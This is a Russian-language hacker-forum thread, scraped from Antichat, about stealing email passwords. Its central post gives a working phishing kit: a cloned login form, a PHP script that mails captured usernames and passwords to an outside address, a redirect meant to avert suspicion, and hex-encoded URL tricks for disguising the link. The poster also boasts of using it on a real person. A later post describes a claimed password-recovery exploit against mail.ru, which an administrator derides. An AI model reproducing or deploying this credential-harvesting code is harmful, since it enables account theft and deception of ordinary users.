Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
19.12.2002, 10:15
|
|
Участник форума
Регистрация: 18.06.2002
Сообщений: 126
Провел на форуме:
65642
Репутация:
46
|
|
Ну че? продолжим, а то Algol закрыл самую тусу, где больше всего постов. Я конечно малость переусердствовал ну..., а как без этого. Бывалый чел поймет меня. Так что продолжим тему в серьез, пока админы не обидятся на столь популярную тему.
|
|
|
19.12.2002, 10:22
|
|
Участник форума
Регистрация: 18.06.2002
Сообщений: 126
Провел на форуме:
65642
Репутация:
46
|
|
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td> Цитата </td></tr><tr><td id="QUOTE">Теперь я раскажу вам о самом простом методе взлома, расчитанный на лоха. Ведь так просто заИметь шестизначку, но так-же легко её потерять. Для начала нам нужно сохранить на харде страницу <span style='color:#00FF00'>ошибки</span>. Сами видете два поля ввода для <span style='color:#009900'>логин</span> и <span style='color:#009900'>пасс</span>. Нам нужно чтобы введя в эти поля данные пароль отсылался прямо к нам в руки. Теперь открываем её с помощью <span style='color:#009900'>html</span> редактора, лучше всего использовать <span style='color:#00FF00'>DreamweaverMX</span>, хотя можете сделать это обычным Notepad, Вот фрагмент скрипта:
<span style='color:#0033FF'><table cellpadding=1 cellspacing=0 border=0>
<form method="post" name="logon" action=" http://mail.xakep.ru/cgi-bin/mail" onSubmit="Save();">
<tr>
<td class=small align=right><b>eiaei</b></td>
<td class=text><input type="text" name="username" size="8" style="width: 95px;"><input type="hidden" name="domain" value="xakep.ru"></td>
<td class=text> @xakep.ru</td>
<td>&nbsp;&nbsp;&nbsp;</td>
<td class=small align=right><b>ia?ieu</b></td>
<td class=text><input type="password" name="password" size="8" style="width: 95px;"></td>
</tr></span>
Нас интересуют только <span style='color:red'>action</span>, <span style='color:red'>username</span> и <span style='color:red'>password</span>. За что отвечают username и password на монятно. А в action нам следует указать путь к нашему <span style='color:#009900'>php скрипту</span>. Вот весь скрипт:
<span style='color:#0033FF'> <?
mail("redx@narod.ru",
"Lost password",
"$username\n
$password
");
echo ("
<META HTTP-EQUIV=\"Refresh\" content =\"0; URL=http://mail.xakep.ru/cgi-bin/mail?index=1\">
");
?></span>
<span style='color:#009900'>Редирект</span> тоже играет важную функцию, и он обязательно должен указывать на страницку ошибки, чтоб не возникало подозрений. Вроде у нас все настроено, осталось провести тест, посмотри на мой <span style='color:#00FF00'>пример</span>.
Для танкистов: <span style='color:#CCFFFF'>нам нужен хост с поддержкой php</span>. Из бесплатных нам подойдет <span style='color:#00FF00'>Holm</span>.
Кажись вы не довольны тем что <span style='color:#009900'>url</span> у вас получился типа <span style='color:#009900'>http://antilamer.h1.ru</span>. И возникает вопрос, как бы все это затарить. Я предлагаю вам хотя бы кодировать в <span style='color:#00FF00'>hex</span>. И мы можем превратить наше www.antilamer.h1.ru в <span style='color:#009900'>%61%6E%74%69%6C%61%6D%65%72% 2E%68%31%2E%72%75</span>. Можно перед hex кодом добавить еще www.xakep.ru@. Выглядеть это будет так:
<span style='color:#009900'>http://xakep.ru@%61%6E%74%69%6C%61%6D%65%72%2E%68%31%2E%7 2%75</span>
Удачного хака.[/QUOTE]<span id='postcolor'>
Я написал такую статью, но на неё мало кто отреагировал, хотя..., самый действенный метод. В отличии от моей ловушки в которую мог попасть случайный прохожий, в этом методе можно направить свою атаку на определённого человека. Самое главное убедить его в необходимости залогиниться с нашей страницы. Методов моря, хоть мыльте от SUPPORT'а или как фантазия позволит. Я свою жертву в Инет-Клубе сам заставил залогиниться, набрал адрес своей страницы, и предложил ему проверить свою почту. Благо мест в зале небыло..., а я такой добрый.
|
|
|
|
19.12.2002, 14:48
|
|
Познающий
Регистрация: 26.09.2002
Сообщений: 40
Провел на форуме:
0
Репутация:
0
|
|
Способ отличный, им можно взломать не только мыло. Можно сделать такую же страницу провайдера и сказать юзверю что это быстрый способ проверить личный кабинет, например, на РОЛе. Неплолхо бы эту статью поместить в мой топик про халявный инет.
|
|
|
|
19.12.2002, 19:52
|
|
Участник форума
Регистрация: 18.06.2002
Сообщений: 126
Провел на форуме:
65642
Репутация:
46
|
|
|
|
|
|
21.12.2002, 14:31
|
|
Новичок
Регистрация: 23.11.2002
Сообщений: 10
Провел на форуме:
0
Репутация:
0
|
|
Да...ничё так способ.Только на лохов из чата расчитан.Надо топик открыть по всем таким способам,ну типа этго или с так называемыми email-роботами RedX'a  |
|
|
|
21.12.2002, 14:35
|
|
Новичок
Регистрация: 23.11.2002
Сообщений: 10
Провел на форуме:
0
Репутация:
0
|
|
и урл напишите тут на новую тему...
|
|
|
|
22.12.2002, 15:04
|
|
Участник форума
Регистрация: 18.06.2002
Сообщений: 126
Провел на форуме:
65642
Репутация:
46
|
|
=> MrPort
Так любой метод расчитан только на лохов, мы то дай бог фишку просечем.
|
|
|
|
03.01.2003, 23:54
|
|
Участник форума
Регистрация: 18.06.2002
Сообщений: 126
Провел на форуме:
65642
Репутация:
46
|
|
Так а что мыло ломать УЖЕ никто не хочет? Ну или научить.
|
|
|
|
14.03.2004, 15:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
На mail.ru несколько МИЛЛИОНОВ пользователей. Есть процент, который имеет слабую память и тупые мозги, чтоб запомнить свой пароль и частенько эти перцы сталкиваются с проблемой забывания пароля Итак, даже небольшой процент от более чем милионной толпы владельцев мыльниц - это тоже своеобразная толпа, которая требует свои пароли. Существуют всякие системы аля "Забыл пароль" в котором вас спрашивают ответ на секретный вопрос, данные, которые Вы вводили при регистрации и т.п. Но самое интересное, что этим занимается не человек, а машина, т.е. обычная программулина !!!! А если есть программа - есть в ней дыра. Теперь приступим к описанию конкретных действий.
Тут все просто. По адресу pass_retriever@mail.ru сидит mail-робот, который анализирует запросы на восстановление пароля и в зависимости от этого либо уточняет ваши данные, либо сразу шлет пароль. На сайте есть форма для заполнения с всевозможными параметрами, которая потом шлется роботу со специальным Subject'ом. Фишка в том, что если в сабжект впихнуть не один, а два запроса, то проверятся будет последний ящик, а информация будет выслана для второго! Так шевелим мозгами... Правильно! Высылаем два запроса: в одном сообщаем инфу о ящике жертве, во втором инфу о своем (о своем то мы все знаем  )
Итак, мы хотим обломать vasya_pupkin@mail.ru
Наш ящик hacker@mail.ru пароль qwerty
Пишем письмо роботу на pass_retriever@mail.ru
Subject: login=vasya_pupkin&pass=&answer=;login=hac ker&pass=qwerty&answer=
Т.е. первый раз вставляем в тему письма запрос о ящике-жертве - vasya_pupkin@mail.ru : login=vasya_pupkin&pass=&answer=
А потом, через точку с запятой второй запрос, с вашими данными, которые робот проверит и убедится, что они правильные!
login=hacker&pass=qwerty&answer=
Итого : тема сообщения выглядит вот так :
login=vasya_pupkin&pass=&answer=;login=hac ker&pass=qwerty&answer=
Все, ждите пасс на ваше мыло!!!  |
|
|
|
15.03.2004, 17:57
|
|
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051
Репутация:
45
|
|
vetal, ты тут нас за детский садик держишь?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
